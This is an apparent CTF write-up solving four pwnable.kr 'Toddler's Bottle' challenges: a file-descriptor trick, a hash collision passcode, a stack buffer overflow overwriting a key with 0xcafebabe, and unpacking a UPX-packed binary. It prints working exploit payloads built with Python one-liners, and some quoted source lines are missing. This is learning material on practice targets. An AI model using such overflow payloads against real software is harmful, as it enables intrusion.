/ #pwnable.kr 

Toddler's Bottle Part 1

File Descriptor

Using the ls -la you'll notice that the suid bit is set for fd executable. Checking the code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
		printf("pass argv[1] a number\n");
		return 0;
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
	printf("learn about Linux file IO\n");
	return 0;

Two important function calls inside the code are atio() which initializes the fd. The fd is then passed to read() as the first argument which is the file descriptor. File descriptor 0 is stdin so the argument should be 0x1234 which is 4660. Then the stdin will be used and then the next input should be LETMEWIN ENTER.


For better understanding I took the code and ran it locally to do different testings (maybe because I'm a toddler :] ). Here's the code I modified a little bit to print a bunch of new stuff:

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
	int* ip = (int*)p;
	int i;
	int res=0;
	for(i=0; i<5; i++){
		res += ip[i];
	printf ("%d\n",res);
	printf ("%lu\n", hashcode);
	printf ("%d\n", (int) hashcode);
	return res;

int main(int argc, char* argv[]){
		printf("usage : %s [passcode]\n", argv[0]);
		return 0;
	if(strlen(argv[1]) != 20){
		printf("passcode length should be 20 bytes\n");
		return 0;

	if(hashcode == check_password( argv[1] )){
		system("/bin/cat flag");
		return 0;
		printf("wrong passcode.\n");
	return 0;

The code needs an argument of length 20 bytes (like 20 characters), but in check_password(), it converts them to int which is 32 bits. So Every 4 chars would form an integer. Then these 5 integers are summed up in the for loop of the check_password() and is then compared to hashcode which is 568134124 decimal. So an easy way is to divide it by 5 and find the 5 numbers:

568134124 = 4*113626824 + 113626828~ OR ~0x21DD09EC = 4*0x6C5CEC8 + 0x6C5CECC

So taking the endianness into account, let's create this string using python and pass it as argument:

$ ./col $(python -c "print '\xc8\xce\xc5\x06'*4 + '\xcc\xce\xc5\x06'")


simple buffer overflow based on this code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
int main(int argc, char* argv[]){
	return 0;

Find the offset of 0xdeadbeef and replace it with 0xcafebabe. We can get the offset by brute-forcing (the easy way) or we can use r2 to calculate the buffer (the hard way). So let's use r2. Here's a snapshot of the ~main~'s variables:

Checking the code you'll notice local_2ch is actually the buffer and clearly arg_8h is the argument, i.e. 0xdeadbeef. So let's calculate how many bytes we have to write (52 bytes):

And now let's create the input string and send it to TCP server using:

python -c "print 'A'*52 + '\xbe\xba\xfe\xca'"

Final result (echo is not needed here, I was too lazy to change the screenshot):


Going through the code in r2's debug mode it's clear that the binary is packed:

[root:~/hostDownloads]# rabin2 -zz ./flag | grep UPX
Warning: Cannot initialize section headers
Warning: Cannot initialize strings table
Warning: Cannot initialize dynamic strings
000 0x000000b4 0x004000b4   4   5 (LOAD0) ascii UPX!
7050 0x0004a656 0x0044a656  78  79 (LOAD0) ascii $Info: This file is packed with the UPX executable packer https://upx.sf.net $\n
7051 0x0004a6a5 0x0044a6a5  75  76 (LOAD0) ascii $Id: UPX 3.08 Copyright (C) 1996-2011 the UPX Team. All Rights Reserved. $\n
8071 0x00051d8c 0x00051d8c   4   5 () ascii UPX!
8072 0x00051d94 0x00051d94   5   6 () ascii UPX!\r

Trying to take the same approach as, for instance, here didn't work considering that the challenge is "toddler". So turns out it's as easy as literally unpacking it:

[root:~/hostDownloads]# upx -d flag                   
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2017
UPX 3.94        Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    883745 <-    335288   37.94%   linux/amd64   flag

Unpacked 1 file. 

and checking the code a little bit and then extracting the string:

[root:~/hostDownloads]# strings flag | grep UPX
UPX...? sounds like a delivery service :)


CTF enthusiast